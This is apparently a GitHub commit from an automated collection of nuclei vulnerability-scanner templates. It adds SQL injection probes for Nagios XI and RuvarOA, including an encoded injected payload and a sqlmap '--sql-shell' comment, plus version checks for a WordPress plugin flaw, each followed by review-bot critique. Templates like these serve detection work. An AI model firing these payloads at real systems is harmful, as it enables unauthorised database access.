Commit

20241028
actions-user committed Oct 28, 2024
1 parent a1a3429 commit e6b6301
Showing 6 changed files with 242 additions and 1 deletion.
2 changes: 1 addition & 1 deletion date.txt
@@ -1 +1 @@
20241027
20241028
4 changes: 4 additions & 0 deletions poc.txt
@@ -28738,6 +28738,7 @@
./poc/cve/CVE-2023-40681-bcd43f3e48145f66be2bc67cf616a567.yaml
./poc/cve/CVE-2023-40681.yaml
./poc/cve/CVE-2023-40779.yaml
./poc/cve/CVE-2023-40931.yaml
./poc/cve/CVE-2023-4109-0063ef5aafbc239d0ec2a8c5031199be.yaml
./poc/cve/CVE-2023-4109.yaml
./poc/cve/CVE-2023-4110.yaml
@@ -44693,6 +44694,7 @@
./poc/cve/CVE-2024-9156.yaml
./poc/cve/CVE-2024-9161-7df3ec5d46908dca2a1515693ac69f54.yaml
./poc/cve/CVE-2024-9161.yaml
./poc/cve/CVE-2024-9162-dcfa27f954fffe01a3cc58b701a4304f.yaml
./poc/cve/CVE-2024-9169-f28b64870e010b6c9a9192d27b27621e.yaml
./poc/cve/CVE-2024-9169.yaml
./poc/cve/CVE-2024-9172-dd6c762e4dc7b5869543b2ed92be27e1.yaml
@@ -76883,6 +76885,7 @@
./poc/other/TVE-2024-105272050.yaml
./poc/other/TVE-2024-105272055.yaml
./poc/other/TVE-2024-105272110.yaml
./poc/other/TVE-2024-105272120.yaml
./poc/other/TVE-2024-105272125.yaml
./poc/other/TVE-2024-105272130.yaml
./poc/other/TVE-2024-105272140.yaml
@@ -128293,6 +128296,7 @@
./poc/wordpress/all-in-one-wp-migration-40d498bb215a53af77b045b1c1b53b98.yaml
./poc/wordpress/all-in-one-wp-migration-42b8cf23786a3bbe3e3114e6f8c77428.yaml
./poc/wordpress/all-in-one-wp-migration-4f5aab84211dafc2157dba34e6995f87.yaml
./poc/wordpress/all-in-one-wp-migration-5e3bb756cdfed072ba6289d58365e320.yaml
./poc/wordpress/all-in-one-wp-migration-7318fc4fa3760012c7c692c7105ac59b.yaml
./poc/wordpress/all-in-one-wp-migration-80b4c5ef73752cc8d2d39fcf966258fb.yaml
./poc/wordpress/all-in-one-wp-migration-a9948b43f2084d190b6d2c7fe8682a33.yaml
77 changes: 77 additions & 0 deletions poc/cve/CVE-2023-40931.yaml
@@ -0,0 +1,77 @@
id: CVE-2023-40931

info:
name: Nagios XI v5.11.0 - SQL Injection
author: ritikchaddha
severity: medium
description: |
A SQL injection vulnerability in Nagios XI from version 5.11.0 up to and including 5.11.1 allows authenticated attackers to execute arbitrary SQL commands via the ID parameter in the POST request to /nagiosxi/admin/banner_message-ajaxhelper.php.
impact: |
Successful exploitation of this vulnerability allows an authenticated attackers to execute arbitrary SQL commands.
remediation: |
Upgrade Nagios XI to a patched version or apply the vendor-supplied patch to mitigate this vulnerability.
reference:
- https://rootsecdev.medium.com/notes-from-the-field-exploiting-nagios-xi-sql-injection-cve-2023-40931-9d5dd6563f8c
- https://nvd.nist.gov/vuln/detail/CVE-2023-40931
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
cvss-score: 6.5
cve-id: CVE-2023-40931
cwe-id: CWE-89
epss-score: 0.00208
epss-percentile: 0.59103
cpe: cpe:2.3:a:nagios:nagios_xi:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 3
vendor: nagios
product: nagios_xi
shodan-query: title:"Nagios XI"
fofa-query: app="nagios-xi"
google-query: intitle:"nagios xi"
tags: cve2023,cve,authenticated,nagiosxi,sqli,nagios

http:
- raw:
- |
GET /nagiosxi/login.php HTTP/1.1
Host: {{Hostname}}
- |
POST /nagiosxi/login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
nsp={{nsp}}&pageopt=login&username={{username}}&password={{password}}
- |
POST /nagiosxi/admin/banner_message-ajaxhelper.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=acknowledge_banner_message&id=*
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Failed to acknowledge"
- "SQL Error"
- "right syntax to use near"
condition: and

- type: status
status:
- 200

extractors:
- type: regex
name: nsp
part: body
group: 1
regex:
- "name=['\"]nsp['\"] value=['\"](.*)['\"]>"
internal: true

# digest: 4a0a00473045022100eaedc676d34f68f9a9a22fc03718775356d34be1a378b3357b5635b2fe881edf022072000ae329286b87e05098a88d3a135a1458d3cefafbe5ac6196122f41dccddc:922c64590222798bb761d5b6d8e72950
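
Review bot: in the second and third raw requests the body line (`nsp={{nsp}}&pageopt=login&...` and `action=acknowledge_banner_message&id=*`) directly follows `Content-Type: application/x-www-form-urlencoded` with no blank line in between; if that is the template's real content and not a rendering artefact of this page, the body is sent as a malformed header, the login never succeeds and the template silently never matches, so a blank line belongs after the last header of each request. The template also relies on `{{username}}` and `{{password}}` being supplied at run time (nuclei `-var`), which the info block never says; one sentence in `description` or `metadata` stating that valid Nagios XI credentials are required would spare users a silent no-match. Detection is error-based (`SQL Error`, `right syntax to use near`, all three words required), so an instance that suppresses database error output is reported as not vulnerable even when it is; worth stating in the description. Minor: the greedy `(.*)` in the `nsp` extractor can over-capture if anything later on the same line ends in `'>` or `">`, and `([^'\"]*)` is tighter; and `allows an authenticated attackers` under `impact` should read `allows an authenticated attacker`.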
59 changes: 59 additions & 0 deletions poc/cve/CVE-2024-9162-dcfa27f954fffe01a3cc58b701a4304f.yaml
@@ -0,0 +1,59 @@
id: CVE-2024-9162-dcfa27f954fffe01a3cc58b701a4304f

info:
name: >
All-in-One WP Migration and Backup <= 7.86 - Authenticated (Administrator+) Arbitrary PHP Code Injection
author: topscoder
severity: low
description: >
The All-in-One WP Migration and Backup plugin for WordPress is vulnerable to arbitrary PHP Code Injection due to missing file type validation during the export in all versions up to, and including, 7.86. This makes it possible for authenticated attackers, with Administrator-level access and above, to create an export file with the .php extension on the affected site's server, adding an arbitrary PHP code to it, which may make remote code execution possible.
reference:
- https://github.com/topscoder/nuclei-wordfence-cve
- https://www.wordfence.com/threat-intel/vulnerabilities/id/d97c3379-56c9-4261-9a70-3119ec121a40?source=api-prod
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
cvss-score: 7.2
cve-id: CVE-2024-9162
metadata:
fofa-query: "wp-content/plugins/all-in-one-wp-migration/"
google-query: inurl:"/wp-content/plugins/all-in-one-wp-migration/"
shodan-query: 'vuln:CVE-2024-9162'
tags: cve,wordpress,wp-plugin,all-in-one-wp-migration,low

http:
- method: GET
redirects: true
max-redirects: 3
path:
- "{{BaseURL}}/wp-content/plugins/all-in-one-wp-migration/readme.txt"

extractors:
- type: regex
name: version
part: body
group: 1
internal: true
regex:
- "(?mi)Stable tag: ([0-9.]+)"

- type: regex
name: version
part: body
group: 1
regex:
- "(?mi)Stable tag: ([0-9.]+)"

matchers-condition: and
matchers:
- type: status
status:
- 200

- type: word
words:
- "all-in-one-wp-migration"
part: body

- type: dsl
dsl:
- compare_versions(version, '<= 7.86')
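
Review bot: `severity: low` (and the `low` tag) contradicts `cvss-score: 7.2` with `CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H`, which is a high score; pick one, and if `low` is deliberate because Administrator-level access is required, say so in the description. The template only reads `Stable tag` from the plugin's readme.txt and checks `compare_versions(version, '<= 7.86')`; it never touches the export path, so it reports an installed plugin version, not the code-injection condition, and since `Stable tag` can lag the actually installed version this yields both false positives and false negatives. `info.name` should make clear that this is a version check. The two `version` extractors are identical apart from `internal: true`; keeping the non-internal copy so the version appears in output is fine, but a short comment saying so would stop the next maintainer from deleting it as a duplicate.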
42 changes: 42 additions & 0 deletions poc/other/TVE-2024-105272120.yaml
@@ -0,0 +1,42 @@
id: 2024-105272120

info:
name: RuvarOA协同办公平台 WorkPlanAttachDownLoad SQL注入漏洞
author: k3ppf0r
severity: high
description: |
RuvarOA协同办公平台 WorkPlanAttachDownLoad SQL注入漏洞,攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
reference:
- https://blog.csdn.net/qq_41904294/article/details/138723401
remediation: |
升级RuvarOA到高版本
classification:
cve-id: 2024-105272120
cvss-score: 7.8
cwe-id: CWE-89
metadata:
date: 2024-05-11
version: RuvarOA V6.01 、RuvarOA V12.01
fofa-query: body="txt_admin_key"
tags: sqli,RuvarOA,leak

# python sqlmap.py -u "http://xxxx?id=1*" --sql-shell


http:
- raw:
- |
@timeout: 10s
GET /WorkPlan/WorkPlanAttachDownLoad.aspx?sys_file_storage_id=1%27%20and%20%28@@version%29%3E0%29-- HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5807.225 Safari/537.36 Edg/112.0.1791.33
Connection: close

stop-at-first-match: true
matchers:
- type: dsl
dsl:
- 'status_code == 200'
condition: and
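
Review bot: the only matcher is `status_code == 200`, so any host that serves `/WorkPlan/WorkPlanAttachDownLoad.aspx` at all, or answers every path with 200, matches regardless of whether the injected expression changed the response; add a body-based matcher tied to what a vulnerable instance actually returns for this request and keep the status check as a guard, otherwise the template is a path probe with a `high` severity label. `classification.cve-id: 2024-105272120` is not a CVE identifier; leave `cve-id` empty (or drop `classification`) and keep the internal number in `id` only. The `# python sqlmap.py -u "http://xxxx?id=1*" --sql-shell` comment is a leftover scratch note that does not even name the parameter this template uses (`sys_file_storage_id`); remove it. `condition: and` under a single-entry `dsl` matcher is a no-op.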

@@ -0,0 +1,59 @@
id: all-in-one-wp-migration-5e3bb756cdfed072ba6289d58365e320

info:
name: >
All-in-One WP Migration and Backup <= 7.86 - Authenticated (Administrator+) Arbitrary PHP Code Injection
author: topscoder
severity: low
description: >
reference:
- https://github.com/topscoder/nuclei-wordfence-cve
- https://www.wordfence.com/threat-intel/vulnerabilities/id/d97c3379-56c9-4261-9a70-3119ec121a40?source=api-scan
classification:
cvss-metrics:
cvss-score:
cve-id:
metadata:
fofa-query: "wp-content/plugins/all-in-one-wp-migration/"
google-query: inurl:"/wp-content/plugins/all-in-one-wp-migration/"
shodan-query: 'vuln:'
tags: cve,wordpress,wp-plugin,all-in-one-wp-migration,low

http:
- method: GET
redirects: true
max-redirects: 3
path:
- "{{BaseURL}}/wp-content/plugins/all-in-one-wp-migration/readme.txt"

extractors:
- type: regex
name: version
part: body
group: 1
internal: true
regex:
- "(?mi)Stable tag: ([0-9.]+)"

- type: regex
name: version
part: body
group: 1
regex:
- "(?mi)Stable tag: ([0-9.]+)"

matchers-condition: and
matchers:
- type: status
status:
- 200

- type: word
words:
- "all-in-one-wp-migration"
part: body

- type: dsl
dsl:
- compare_versions(version, '<= 7.86')
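
Review bot: this file is a copy of `poc/cve/CVE-2024-9162-dcfa27f954fffe01a3cc58b701a4304f.yaml` from the same commit (only `id` and the `?source=api-scan` reference differ) with `description: >`, `cvss-metrics:`, `cvss-score:`, `cve-id:` and `shodan-query: 'vuln:'` left empty, so it carries no description or classification data at all while still tagged `cve`. Either drop this duplicate in favour of the CVE-named template or fill the blanked fields from it; once the score is restored the same `severity: low` versus CVSS 7.2 mismatch applies here.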
